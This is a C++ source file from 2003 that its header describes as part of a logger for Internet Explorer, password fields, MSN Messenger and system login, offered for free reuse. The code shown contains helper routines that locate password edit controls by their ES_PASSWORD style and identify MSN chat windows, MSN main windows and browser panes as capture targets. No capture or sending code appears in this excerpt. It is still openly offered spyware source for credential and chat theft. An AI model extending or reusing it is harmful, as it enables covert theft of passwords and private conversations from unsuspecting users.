/************************************
  REVISION LOG ENTRY
  Revision By: Zhang, Zhefu
  E-mail: codetiger@hotmail.com
  Revised on 7/3/2003 
  Comment: This is part of the logger for IE, password edit, MSN, system login.
           You are free to use to use the code on the base of keeping this comment
		   All rights reserved. May not be sold for profit.
 ************************************/
#include "ComDef.h"

void PopMsg(LPCTSTR pszFormat, ...) 
{
//#ifndef _DEBUG
//	return;
//#endif
   va_list argList;
   va_start(argList, pszFormat);

   TCHAR sz[1024];
//#ifdef _UNICODE
//   vswprintf(sz, pszFormat, argList);
//#else
//   vsprintf(sz, pszFormat, argList);
//#endif
   wvsprintf(sz, pszFormat, argList);
   va_end(argList);
   ::MessageBox(NULL, sz, _T("Pop Msg"), MB_OK);
}

void ReportErr(LPCTSTR str)
{
	    LPVOID lpMsgBuf;
        FormatMessage( 
           FORMAT_MESSAGE_ALLOCATE_BUFFER | 
           FORMAT_MESSAGE_FROM_SYSTEM | 
           FORMAT_MESSAGE_IGNORE_INSERTS,
           NULL,
           ::GetLastError(),
           MAKELANGID(LANG_ENGLISH, SUBLANG_ENGLISH_US), // Default language
           (LPTSTR) &lpMsgBuf,
           0,
           NULL 
       );
		::MessageBox( NULL, (LPCTSTR)lpMsgBuf, 
		   str, MB_OK | MB_ICONINFORMATION );
       // Free the buffer.
       LocalFree( lpMsgBuf );
}

//More criterion Could be applied here 
//ie. C#'s edit is WindowsForms10.EDIT.appx. ....
BOOL IsPasswordEdit(HWND hEdit)
{
	TCHAR szClassName[64];
	int nRet = GetClassName(hEdit, szClassName, 64);
    if(nRet == 0) return FALSE;
	szClassName[nRet] = 0;
	if(::lstrcmp(szClassName, _T("Edit")) == 0 || 
	   ::lstrcmp(szClassName, _T("ThunderTextBox")) == 0 ||
	   ::lstrcmp(szClassName, _T("TEdit")) == 0)
	{
		DWORD dw = ::GetWindowLong(hEdit,GWL_STYLE);
	    dw &= ES_PASSWORD;
        if(dw == ES_PASSWORD)
		   return TRUE;
	}
	return FALSE;
}

//Chat Window's name is "IMWindowClass" in MSN IM 4.6, 4.7, 5.0 and 6.0
//but the main window's name changed. 
BOOL IsMSNChat(HWND hWnd)
{
	TCHAR szClassName[64];
	int nRet = GetClassName(hWnd, szClassName, 64);
    if(nRet == 0) return FALSE; //Maybe a long class name, just let it go
	szClassName[nRet] = 0;
	if(::lstrcmp(szClassName, _T("IMWindowClass")) != 0) return FALSE;
	return TRUE;
}

//Messenger 4.6, 4.7 MSBLClass
//Messenger 5.0 MSNMSBLClass
//This is the Messenger Main Window which Contains the Contact List
BOOL IsMSNMain(HWND hWnd)
{
    TCHAR szClassName[64];
	int nRet = GetClassName(hWnd, szClassName, 64);
    if(nRet == 0) return FALSE; //Maybe a long class name, just let it go
	szClassName[nRet] = 0;
	if(::lstrcmp(szClassName, _T("MSNMSBLClass")) != 0 && 
		::lstrcmp(szClassName, _T("MSBLClass")) != 0) return FALSE;
	return TRUE;
}

BOOL IsBrowser(HWND hWnd)
{
	TCHAR szClassName[64];
	int nRet = GetClassName(hWnd, szClassName, 64);
    if(nRet == 0) return FALSE;
	szClassName[nRet] = 0;
	if(::lstrcmp(szClassName, 
		//_T("Shell Embedding")
		_T("Internet Explorer_Server")
		) != 0) return FALSE;

	return TRUE;
}

